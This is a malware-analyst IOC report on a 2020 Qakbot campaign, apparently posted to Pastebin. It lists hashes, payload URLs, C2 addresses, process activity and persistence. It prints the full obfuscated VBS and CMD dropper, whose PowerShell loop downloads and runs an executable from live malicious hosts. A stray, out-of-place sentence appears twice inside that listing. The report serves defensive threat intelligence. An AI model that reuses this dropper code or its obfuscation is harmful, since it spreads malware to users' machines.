Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #Qakbot_Qbot #macros #WSH #opendir
- https://pastebin.com/2EgQnFjW
- previous_contact: n/a
- FAQ:
- https://n1ght-w0lf.github.io/malware%20analysis/qbot-banking-trojan/
- https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot
- attack_vector
- --------------
- email attach .zip > DOC > macro > WSH > CMD > PowerShell > GET exe
- email_headers
- --------------
- n/a
- files
- --------------
- SHA-256 b249a39d2754ce9d5f81fb65c4cc744492923e47f51299b87996e230894df97a
- File name 08252020_365727360.zip [ Zip archive data, at least v2.0 to extract ]
- File size 321.84 KB (329568 bytes)
- SHA-256 8374cb6d37e2a002f93b3b2646d3550ed2915ac4fec2ed14db3557ac245f32c1
- File name 08252020_365727360.doc [ Office Open XML Document ]
- File size 328.47 KB (336352 bytes)
- SHA-256 1e77f308d4e8ce8ea219fa9e18656eeedb947fd12aaf9730daa65e85cab38adf
- File name 55555555.png [ PE32 executable for MS Windows ]
- File size 1.86 MB (1953776 bytes)
- SHA-256 e920f6ed9aa65595a6b52d6601bd9091ef87f5128d6fdfc8f5ebd1fec12740f7
- File name ikaaazen.exe [ PE32 executable for MS Windows ]
- File size 1.86 MB (1953776 bytes)
- activity
- --------------
- PL_SCR rosemiracle.} com/smmafmjmmjpx/55555555.png - 404
- ricari.com.} br/spdwacdphg/55555555.png - 200
- fishlovingworld.} com/imbmgiqzrki/55555555.png - 200
- styletadka.} in/fkvias/55555555.png - 404
- test.bateaux-bois.} com/cgcxd/55555555.png - 200
- lumanaridecorative.} com/vnmjevz/55555555.png - 200
- kmbuzz.} com/tlrmuyrjc/55555555.png - 200
- alfredoburguers.} cl/vhrizp/55555555.png - 200
- teste4.filimartis.} com.} br/jdnpsysj/55555555.png - 200
- equitymm.} com/idlzuojgtfo/55555555.png - 404
- americanwardrobefitters.} com/xsgqcd/55555555.png - 200
- onlyicon.} com/jbhmomji/55555555.png - 200
- C2 [spx161]
- 213.67.45.195:2222
- 75.182.214.87:443
- 81.133.234.36:2222
- 199.116.241.147:443
- 75.136.40.155:443
- 72.204.242.138:443
- 94.52.160.116:443
- 151.73.112.220:443
- 71.126.139.251:443
- 98.173.34.212:995
- 41.34.91.244:995
- 103.238.231.40:443
- 47.153.115.154:995
- 104.221.4.11:2222
- 185.126.13.230:995
- 137.99.224.198:443
- 73.4.138.94:443
- 201.216.216.245:443
- 175.211.225.118:443
- 76.179.54.116:443
- 70.164.37.205:995
- 207.246.75.201:443
- 97.93.211.17:443
- 71.74.12.34:443
- 207.246.71.122:443
- 80.240.26.178:443
- 45.32.154.10:443
- 108.27.217.44:443
- 80.14.209.42:2222
- 207.255.161.8:993
- 207.255.161.8:995
- 84.117.176.32:443
- 87.255.83.83:443
- 154.56.69.231:443
- 108.28.179.42:995
- 191.84.11.252:443
- 69.26.23.143:2222
- 98.16.204.189:995
- 24.27.82.216:2222
- 184.89.71.68:443
- 199.247.16.80:443
- 86.191.145.103:2222
- 207.255.161.8:2078
- 66.30.92.147:443
- 115.21.224.117:443
- 63.155.28.199:995
- 47.146.32.175:443
- 24.37.178.158:443
- 69.11.247.242:443
- 165.120.230.108:2222
- 36.77.151.211:443
- 96.20.108.17:2222
- 73.228.1.246:443
- 76.170.77.99:995
- 174.30.165.242:2222
- 94.205.171.126:995
- 39.118.245.6:443
- 83.216.134.94:2222
- 118.160.161.124:443
- 45.47.65.191:443
- 67.165.206.193:993
- 93.151.180.170:61202
- 98.210.41.34:443
- 50.29.181.193:995
- 78.96.199.79:443
- 66.215.32.224:443
- 93.114.192.104:2222
- 86.98.89.189:2222
- 75.87.161.32:995
- 203.198.96.186:443
- 141.158.47.123:443
- 73.78.149.206:443
- 35.134.202.234:443
- 67.170.137.8:443
- 96.18.240.158:443
- 75.110.250.89:995
- 98.219.77.197:443
- 24.201.79.208:2078
- 96.227.127.13:443
- 65.131.104.249:995
- 70.164.39.91:443
- 98.121.187.78:443
- 209.137.209.163:995
- 178.87.28.63:443
- 78.100.229.44:61201
- 90.175.88.99:2222
- 74.56.167.31:443
- 206.51.202.106:50003
- 5.15.65.198:2222
- 71.84.5.114:995
- 65.96.36.157:443
- 47.44.217.98:443
- 72.190.101.70:443
- 92.99.249.199:443
- 217.165.164.57:2222
- 71.163.222.7:443
- 72.204.242.138:32102
- 72.204.242.138:50001
- 101.108.117.41:443
- 77.27.174.49:995
- 217.165.115.0:990
- 199.247.22.145:443
- 72.204.242.138:53
- 72.204.242.138:990
- 173.26.189.151:443
- 84.78.128.76:2222
- 47.206.174.82:443
- 189.157.196.112:995
- 39.36.101.208:995
- 193.248.44.2:2222
- 37.210.51.210:443
- 94.99.116.7:995
- 31.215.99.5:443
- 47.28.131.209:443
- 100.4.173.223:443
- 72.209.191.27:443
- 209.182.122.217:443
- 5.193.155.181:2078
- 103.110.49.88:443
- 12.5.37.3:995
- 216.163.4.132:443
- 72.66.47.70:443
- 59.124.10.133:443
- 96.19.117.140:443
- 24.205.42.241:443
- 172.78.30.215:443
- 71.80.66.107:443
- 197.165.161.55:995
- 45.32.155.12:443
- 45.77.215.141:443
- 68.190.152.98:443
- 80.195.103.146:2222
- 2.90.123.252:443
- 174.110.39.220:443
- 71.187.170.235:443
- 72.204.242.138:32100
- 49.191.3.189:443
- 142.129.227.86:443
- 67.209.195.198:443
- 2.90.53.174:995
- 95.77.223.148:443
- 41.228.4.27:443
- 188.25.162.27:443
- 130.25.130.19:2222
- 211.24.72.253:443
- 68.174.15.223:443
- 216.201.162.158:443
- 74.135.37.79:443
- 94.59.241.189:995
- netwrk
- --------------
- [http]
- 216.21.13.115 ricari.com.br GET /spdwacdphg/55555555.png (!) MZ !This program cannot be run in DOS mode.
- comp
- --------------
- powershell.exe 2668 TCP 83.150.213.54 80 ESTABLISHED
- powershell.exe 2668 TCP 216.21.13.115 80 ESTABLISHED
- proc
- --------------
- C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE
- C:\Windows\SysWOW64\explorer.exe explorer.exe C:\ProgramData\re.vbs
- {other context}
- C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
- C:\Windows\System32\WScript.exe" "C:\ProgramData\re.vbs
- C:\Windows\System32\cmd.exe /c ""C:\Ulohot\POUITYRSDFuytrdFGHTYDFGBJN.cmd" "
- C:\Windows\system32\taskkill.exe
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWerShell Foreach($url in @('http://rosemiracle.com/smmafmjmmjpx/55555555.png','http://ricari.com.br/spdwacdphg/55555555.png','http://fishlovingworld.com/imbmgiqzrki/55555555.png','http://styletadka.in/fkvias/55555555.png','http://test.bateaux-bois.com/cgcxd/55555555.png','http://lumanaridecorative.com/vnmjevz/55555555.png','http://kmbuzz.com/tlrmuyrjc/55555555.png','http://alfredoburguers.cl/vhrizp/55555555.png','http://teste4.filimartis.com.br/jdnpsysj/55555555.png','http://equitymm.com/idlzuojgtfo/55555555.png','http://americanwardrobefitters.com/xsgqcd/55555555.png','http://onlyicon.com/jbhmomji/55555555.png')) { try{$path = 'C:\Ulohot\GretiodetGDFERT.exe'; (New-Object Net.WebClient).DownloadFile($url.ToString(), $path);saps $path; break;}catch{write-host $_.Exception.Message}}
- C:\Ulohot\GretiodetGDFERT.exe
- C:\Ulohot\GretiodetGDFERT.exe /C
- C:\Windows\system32\timeout.exe /T 10
- {alternative run}
- C:\Users\operator\AppData\Roaming\Microsoft\Tkqyidzyu\ikaaazen.exe
- C:\Users\operator\AppData\Roaming\Microsoft\Tkqyidzyu\ikaaazen.exe /C
- C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn omjbpoxjy /tr "\"C:\Ulohot\GretiodetGDFERT.exe\" /I omjbpoxjy" /SC ONCE /Z /ST 08:05 /ET 08:17
- "C:\Windows\system32\schtasks.exe" /create /tn {CB895919-CAFA-4089-9BC0-B5CAA5E6F386} /tr "\"C:\Users\operator\AppData\Roaming\Microsoft\Tkqyidzyu\ikaaazen.exe"" /sc HOURLY /mo 5 /F
- {recon activiry}
- command: whoami /all
- command: cmd /c set
- command: ipconfig /all
- command: net view /all
- command: nslookup -querytype=ALL -timeout=10 _ldap._tcp.dc._msdcs.WORKGROUP
- command: nslookup -querytype=ALL -timeout=10 _ldap._tcp.dc._msdcs.WORKGROUP
- command: net share
- command: route print
- command: netstat -nao
- command: net localgroup
- command: qwinsta
- persist
- --------------
- NT AUTHORITY\SYSTEM
- C:\Ulohot\GretiodetGDFERT.exe
- CB895919-CAFA-4089-9BC0-B5CAA5E6F386
- C:\Users\operator\AppData\Roaming\Microsoft\Tkqyidzyu\ikaaazen.exe
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\*
- C:\Users\operator\AppData\Roaming\Microsoft\Tkqyidzyu\ikaaazen.exe
- drop
- --------------
- C:\ProgramData\PIYRFFjjhFGrftfgFYgrfthVfYHtrfGhyhf
- C:\ProgramData\re.vbs
- C:\Ulohot\GretiodetGDFERT.exe
- C:\Ulohot\POUITYRSDFuytrdFGHTYDFGBJN.cmd
- C:\Users\operator\AppData\Roaming\Microsoft\Tkqyidzyu\ikaaazen.exe
- re.vbs
- --------------
- set GetyuwuiebejhwbjTYYIDTIFFGD=CreateObject("Scripting.FileSystemObject")
- If Not GetyuwuiebejhwbjTYYIDTIFFGD.FolderExists("c:\Ulohot") Then
- GetyuwuiebejhwbjTYYIDTIFFGD.CreateFolder ("c:\Ulohot")
- End If
- e13 = ("Taskkill /IM ""winword.exe"" /F")
- a1 = ("POW^")a2 = ("erS^")a3 = ("hell ^")a4 = ("Forea^")a5 = ("ch($ur^")a6 = ("l in^")a7 = (" @('^")
- a8 = ("http://rosemiracle.com/smmafmjmmjpx/55555555.png','http://ricari.com.br/spdwacdphg/55555555.png','http://fishlovingworld.com/imbmgiqzrki/55555555.png','http://styletadka.in/fkvias/55555555.png','http://test.bateaux-bois.com/cgcxd/55555555.png','http://lumanaridecorative.com/vnmjevz/55555555.png','http://kmbuzz.com/tlrmuyrjc/55555555.png','http://alfredoburguers.cl/vhrizp/55555555.png','http://teste4.filimartis.com.br/jdnpsysj/55555555.png','http://equitymm.com/idlzuojgtfo/55555555.png','http://americanwardrobefitters.com/xsgqcd/55555555.png^")
- a9 = ("','^")a10 = ("http://onlyicon.com/jbhmomji/55555555.png^")
- a11 = ("')) { tr^")a12 = ("y{$pat^")a15 = ("h = 'C:\Ulohot\GretiodetGDFERT.exe'; ^")
- a16 = ("(Ne^")a17 = ("w-Obje^")a18 = ("ct Ne^")a19 = ("t.We^")a20 = ("bCli^")a21 = ("ent).Down^")
- a22 = ("loadF^")a23 = ("ile(^")a24 = ("$ur^")a25 = ("l.ToSt^")a26 = ("ring^")b1 = ("(), $p^")
- b2 = ("ath)^")b3 = (";sa^")b4 = ("ps $p^")b5 = ("ath; br^")b6 = ("eak;}c^")b7 = ("atc^")
- b8 = ("h{wri^")b9 = ("te-ho^")b10 = ("st $_.E^")b11 = ("xcep^")b12 = ("tio^")b13 = ("n.Me^")
- b14 = ("ssa^")b15 = ("ge}}")
- Wait = ("TIMEOUT /T 10 & DEL C:\ProgramData\re.vbs & DEL C:\Ulohot\POUITYRSDFuytrdFGHTYDFGBJN.cmd & DEL C:\ProgramData\PIYRFFjjhFGrftfgFYgrfthVfYHtrfGhyhf")
- Dim oShell : Set oShell = CreateObject("WScript.Shell")
- WScript.Sleep 7000
- oShell.Run "C:\Ulohot\POUITYRSDFuytrdFGHTYDFGBJN.cmd", 0, 0
- Set WshShell = Nothing
- 'NorteDolk 'NorteDolk 'NorteDolk
- POUITYRSDFuytrdFGHTYDFGBJN.cmd
- --------------
- You're going to need to keep at least 8 of the src at the end of the string. You need to modify the input documentation page.
- Taskkill /IM "winword.exe" /F
- POW^erS^hell ^Forea^ch($ur^l in^ @('^
- http://rosemiracle.com/smmafmjmmjpx/55555555.png','
- http://ricari.com.br/spdwacdphg/55555555.png','
- http://fishlovingworld.com/imbmgiqzrki/55555555.png','
- http://styletadka.in/fkvias/55555555.png','
- http://test.bateaux-bois.com/cgcxd/55555555.png','
- http://lumanaridecorative.com/vnmjevz/55555555.png','
- http://kmbuzz.com/tlrmuyrjc/55555555.png','
- http://alfredoburguers.cl/vhrizp/55555555.png','
- http://teste4.filimartis.com.br/jdnpsysj/55555555.png','
- http://equitymm.com/idlzuojgtfo/55555555.png','
- http://americanwardrobefitters.com/xsgqcd/55555555.png^
- ','^http://onlyicon.com/jbhmomji/55555555.png^'))
- { tr^y{$pat^h = 'C:\Ulohot\GretiodetGDFERT.exe'; ^
- (Ne^w-Obje^ct Ne^t.We^bCli^ent).Down^loadF^ile(^$ur^l.ToSt^ring^(), $p^ath)^;sa^ps $p^ath; br^eak;}
- c^atc^h{wri^te-ho^st $_.E^xcep^tio^n.Me^ssa^ge}}
- You're going to need to keep at least 8 of the src at the end of the string. You need to modify the input documentation page.
- TIMEOUT /T 10 &
- DEL C:\ProgramData\re.vbs &
- DEL C:\Ulohot\POUITYRSDFuytrdFGHTYDFGBJN.cmd &
- DEL C:\ProgramData\PIYRFFjjhFGrftfgFYgrfthVfYHtrfGhyhf
- # # #
- https://www.virustotal.com/gui/file/b249a39d2754ce9d5f81fb65c4cc744492923e47f51299b87996e230894df97a/details
- https://www.virustotal.com/gui/file/8374cb6d37e2a002f93b3b2646d3550ed2915ac4fec2ed14db3557ac245f32c1/details
- https://www.virustotal.com/gui/file/1e77f308d4e8ce8ea219fa9e18656eeedb947fd12aaf9730daa65e85cab38adf/details
- https://www.virustotal.com/gui/file/e920f6ed9aa65595a6b52d6601bd9091ef87f5128d6fdfc8f5ebd1fec12740f7/details
- https://analyze.intezer.com/analyses/2638bd19-de0a-4ce7-b7cf-da19052d14e0
- https://analyze.intezer.com/analyses/6eb14337-f3b1-46da-aeed-c7c01b528f1d
- VR
Add Comment
Please, Sign In to add comment